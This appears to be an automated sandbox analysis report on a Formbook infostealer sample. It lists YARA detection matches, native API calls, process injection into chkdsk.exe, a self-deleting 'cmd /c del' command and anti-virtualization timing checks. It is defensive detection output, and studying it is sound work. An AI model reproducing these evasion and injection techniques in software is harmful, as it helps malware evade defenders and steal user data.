          Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041A060 NtClose,1_2_0041A060
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041A110 NtAllocateVirtualMemory,1_2_0041A110
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00419F30 NtCreateFile,1_2_00419F30
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00419FE0 NtReadFile,1_2_00419FE0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041A05A NtClose,1_2_0041A05A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041A10B NtAllocateVirtualMemory,1_2_0041A10B
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00419FDA NtReadFile,1_2_00419FDA
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459540 NtReadFile,LdrInitializeThunk,1_2_01459540
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01459910
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014595D0 NtClose,LdrInitializeThunk,1_2_014595D0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014599A0 NtCreateSection,LdrInitializeThunk,1_2_014599A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459840 NtDelayExecution,LdrInitializeThunk,1_2_01459840
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01459860
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014598F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_014598F0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459710 NtQueryInformationToken,LdrInitializeThunk,1_2_01459710
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459780 NtMapViewOfSection,LdrInitializeThunk,1_2_01459780
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014597A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_014597A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459A50 NtCreateFile,LdrInitializeThunk,1_2_01459A50
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01459660
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01459A00
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459A20 NtResumeThread,LdrInitializeThunk,1_2_01459A20
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014596E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_014596E0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459950 NtQueueApcThread,1_2_01459950
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459560 NtWriteFile,1_2_01459560
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459520 NtWaitForSingleObject,1_2_01459520
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145AD30 NtSetContextThread,1_2_0145AD30
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014599D0 NtCreateProcessEx,1_2_014599D0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014595F0 NtQueryInformationFile,1_2_014595F0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145B040 NtSuspendThread,1_2_0145B040
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459820 NtEnumerateKey,1_2_01459820
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014598A0 NtWriteVirtualMemory,1_2_014598A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459760 NtOpenProcess,1_2_01459760
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459770 NtSetInformationFile,1_2_01459770
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145A770 NtOpenThread,1_2_0145A770
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459B00 NtSetValueKey,1_2_01459B00
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145A710 NtOpenProcessToken,1_2_0145A710
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459730 NtQueryVirtualMemory,1_2_01459730
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459FE0 NtCreateMutant,1_2_01459FE0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145A3B0 NtGetContextThread,1_2_0145A3B0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459650 NtQueryValueKey,1_2_01459650
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459670 NtQueryInformationProcess,1_2_01459670
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459610 NtEnumerateValueKey,1_2_01459610
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459A10 NtQuerySection,1_2_01459A10
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014596D0 NtCreateKey,1_2_014596D0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459A80 NtOpenDirectoryObject,1_2_01459A80
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041E1471_2_0041E147
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D27D1_2_0041D27D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041E3B61_2_0041E3B6
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00409E401_2_00409E40
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00409E3C1_2_00409E3C
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041E74D1_2_0041E74D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E1D551_2_014E1D55
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141F9001_2_0141F900
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E2D071_2_014E2D07
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01410D201_2_01410D20
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014341201_2_01434120
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E25DD1_2_014E25DD
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142D5E01_2_0142D5E0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014425811_2_01442581
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DD4661_2_014DD466
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D10021_2_014D1002
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142841F1_2_0142841F
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E28EC1_2_014E28EC
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142B0901_2_0142B090
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A01_2_014420A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E20A81_2_014E20A8
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E2B281_2_014E2B28
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DDBD21_2_014DDBD2
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E1FF11_2_014E1FF1
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144EBB01_2_0144EBB0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01436E301_2_01436E30
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E2EF71_2_014E2EF7
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E22AE1_2_014E22AE
          Source: C:\Users\user\Desktop\74852.exeCode function: String function: 0141B150 appears 35 times
          Source: C:\Users\user\Desktop\74852.exeCode function: String function: 00237C6A appears 60 times
          Source: 74852.exe, 00000000.00000003.241665351.000000001C90F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 74852.exe
          Source: 74852.exe, 00000001.00000002.287145563.000000000150F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 74852.exe
          Source: 74852.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@10/3
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_01
          Source: 74852.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\74852.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 74852.exeReversingLabs: Detection: 43%
          Source: C:\Users\user\Desktop\74852.exeFile read: C:\Users\user\Desktop\74852.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\74852.exe 'C:\Users\user\Desktop\74852.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\74852.exe 'C:\Users\user\Desktop\74852.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\74852.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\74852.exeProcess created: C:\Users\user\Desktop\74852.exe 'C:\Users\user\Desktop\74852.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\74852.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: 74852.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: 74852.exe, 00000000.00000003.239671965.000000001C660000.00000004.00000001.sdmp, 74852.exe, 00000001.00000002.287145563.000000000150F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 74852.exe
          Source: 74852.exeStatic PE information: real checksum: 0x192ce should be: 0x3b2c0
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_00237C90 push eax; ret 0_2_00237CBE
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00237C90 push eax; ret 1_2_00237CBE
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D0D2 push eax; ret 1_2_0041D0D8
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D0DB push eax; ret 1_2_0041D142
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D085 push eax; ret 1_2_0041D0D8
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00408138 push edi; retf 1_2_0040813F
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D13C push eax; ret 1_2_0041D142
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D22A push BBECAF91h; ret 1_2_0041D277
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00416A3E push cs; retf 1_2_00416A52
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00416AD6 push eax; iretd 1_2_00416AD7
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00416AB0 pushad ; retf 1_2_00416AB4
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00417B60 push cs; iretd 1_2_00417B62
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00403658 push FFFFFFA6h; iretd 1_2_0040365A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00416674 push edx; retf 1_2_00416689
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041E6A3 push esi; retf 1_2_0041E6A5
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041DF21 push es; ret 1_2_0041DF22
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_004167A7 push edi; ret 1_2_004167A8
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0146D0D1 push ecx; ret 1_2_0146D0E4
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\74852.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\74852.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000010098E4 second address: 00000000010098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000001009B5E second address: 0000000001009B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Windows\explorer.exe TID: 6880Thread sleep count: 55 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6880Thread sleep time: -110000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.268007114.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.268007114.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S##
          Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000002.00000000.255880997.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000002.00000000.268504207.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000002.00000000.268504207.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000000.261751329.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\74852.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\74852.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0040ACD0 LdrLoadDll,1_2_0040ACD0
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_00237790 mov eax, dword ptr fs:[00000030h]0_2_00237790
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115F016 mov eax, dword ptr fs:[00000030h]0_2_0115F016
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115F885 mov eax, dword ptr fs:[00000030h]0_2_0115F885
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115F925 mov eax, dword ptr fs:[00000030h]0_2_0115F925
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115F8C2 mov eax, dword ptr fs:[00000030h]0_2_0115F8C2
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115FA6D mov eax, dword ptr fs:[00000030h]0_2_0115FA6D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00237790 mov eax, dword ptr fs:[00000030h]1_2_00237790
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01453D43 mov eax, dword ptr fs:[00000030h]1_2_01453D43
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143B944 mov eax, dword ptr fs:[00000030h]1_2_0143B944
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143B944 mov eax, dword ptr fs:[00000030h]1_2_0143B944
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01493540 mov eax, dword ptr fs:[00000030h]1_2_01493540
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01437D50 mov eax, dword ptr fs:[00000030h]1_2_01437D50
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141C962 mov eax, dword ptr fs:[00000030h]1_2_0141C962
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B171 mov eax, dword ptr fs:[00000030h]1_2_0141B171
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B171 mov eax, dword ptr fs:[00000030h]1_2_0141B171
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143C577 mov eax, dword ptr fs:[00000030h]1_2_0143C577
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143C577 mov eax, dword ptr fs:[00000030h]1_2_0143C577
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419100 mov eax, dword ptr fs:[00000030h]1_2_01419100
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419100 mov eax, dword ptr fs:[00000030h]1_2_01419100
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419100 mov eax, dword ptr fs:[00000030h]1_2_01419100
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]1_2_01434120
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]1_2_01434120
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]1_2_01434120
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]1_2_01434120
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov ecx, dword ptr fs:[00000030h]1_2_01434120
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141AD30 mov eax, dword ptr fs:[00000030h]1_2_0141AD30
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DE539 mov eax, dword ptr fs:[00000030h]1_2_014DE539
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
